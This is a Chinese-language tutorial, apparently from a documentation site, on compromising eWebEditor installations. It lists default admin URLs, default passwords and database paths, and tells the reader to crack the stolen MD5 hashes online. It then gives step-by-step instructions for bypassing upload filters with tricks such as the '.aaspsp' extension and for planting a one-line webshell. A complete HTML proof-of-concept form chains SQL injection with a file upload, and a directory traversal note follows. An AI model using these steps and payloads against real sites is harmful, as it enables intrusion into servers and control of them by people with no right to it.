ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
[TOC] ### Ewebeditor编辑器: Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。eWebEditor!已基本成为网站内容管理发布的必备工具! ### Ewebeditor利用核心: > **默认后台:** `www.xxxx.com/ewebeditor/admin_login.asp` **默认数据库:** ewebeditor/db/ewebeditor.mdb            ●一定要修改,否则会被恶意下载 **默认账号密码:** admin /admin,admin888                ●一定要修改,弱口令不安全 ### ewebeditor入侵过程: * * * 1. 首先访问默认管理页看是否存在 2.80以前,默认管理页地址为ewebeditor/admin\_login.asp 以后版本为admin/login.asp(其他语言改后缀即可)  2. 默认管理帐号密码  默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin/admin888 !常用的密码还有admin,admin999,admin1,admin000之类的。 3. 默认数据库地址 如果密码不是默认的,就要尝试下载数据库得到管理员密码!管理员的帐号密码,都在`eWebEditor_System`表段里,`sys_UserName`,`Sys_UserPass` 都是md5加密的。 得到了加密密码。可以去www.cmd5.com 等网站进行查询!暴力这活好久不干了!也可以丢国外一些可以跑密码的网站去跑! ~~~ #默认数据库路径为: ewebeditor/db/ewebeditor.mdb ​ #常用数据库路径为:不同版本不一样 ewebeditor/db/ewebeditor.asa  ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa  ewebeditor/db/#ewebeditor.mdb ewebeditor/db/ewebeditor.mdb ewebeditor/db/!@#ewebeditor.asp  ewebeditor/db/ewebeditor1033.mdb ~~~ 很多管理员常改.asp后缀,一般访问.asp .asa 后缀的都是乱码!可以用下载工具下载后改后缀为.mdb ### 漏洞基本利用步骤,以asp的2.1.6为例! **登陆编辑器后台以后** > 低版本ewebeditor不支持ie7.0以下版本访问(ietest软件模拟ie6.0上传) #### **1、通过修改样式上传文件** * * * 选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀asa .cer .cdx等方便我们上次小马儿。 **1、点击样式管理,然后新增样式** **2、在图片类型中加入以下类型:asa|cer|asp|aaspsp 然后点击提交。** > asp后缀很可能过滤过了。但是我们可以用.aaspsp后缀来添加,这样上传文件正好被ewebeditor 吃掉asp后缀,剩下.asp 。 同样,如果遇到一个管理员有安全意识的,从代码里,把.asp .asa .cer .cdx 都完全禁止了,我们也可以用.asasaa 后缀来突破。 **3、然后在工具栏里新增工具** **4、在按钮设置里新增"插入或修改图片",其他随意。** **5、然后直接上传一句话木马“123.cer”,这里因为高版本浏览器不能正常显示,所以切换了低版本的浏览器。** **6、点击确定,上传成功,之后,查看代码,就能看到完整的地址,链接即可获取webshll。** #### 2、文件上传漏洞 * * * **ewebeditor asp版 2.1.6 上传漏洞利用程序:** **1、将下面的POC保存为HTML文件,将IP改成目标ip** ~~~html <form action="http://127.0.0.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> ~~~ **2、然后打开文件,可以选择文件上传一句话木马“123.cer”** **3、上传成功后,会出现黑色报错,然后我们点击右键查看源代码** **4、可以从源代码中发现文件上传成功,文件名为“2020811162147343.cer”** **5、然后连接该木马,默认的文件路径是** 192.x.x.x/uploadfile/2020811162147343.cer #### 3、目录遍历漏洞: 必须换成2.8.0才存在这个漏洞,使用../../来跳转目录。